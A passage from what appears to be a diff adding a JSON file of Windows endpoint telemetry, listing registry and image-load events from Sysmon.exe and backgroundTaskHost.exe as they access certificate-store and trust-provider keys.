"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691670000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": 
"C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog\\ContentDeliveryManager.Background.WatchdogTask", + "registry_value": "ContentDeliveryManager.Background.WatchdogTask", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wincorlib.dll", + "image_path": "C:\\Windows\\System32\\wincorlib.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sppc.dll", + "image_path": "C:\\Windows\\System32\\sppc.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": 